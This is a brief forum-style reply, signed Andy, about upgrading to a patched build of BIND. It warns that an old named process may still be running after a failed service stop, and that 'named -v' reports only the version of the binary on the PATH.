This should be it... You have compiled and are running the latest patched version of Bind... Since stopping the old service reported Failed, do confirm that no named process from the old binary is still running before calling this done: named -v only reports the version of the binary on Your PATH, not the version of the process that is actually answering queries.

Regards.

Andy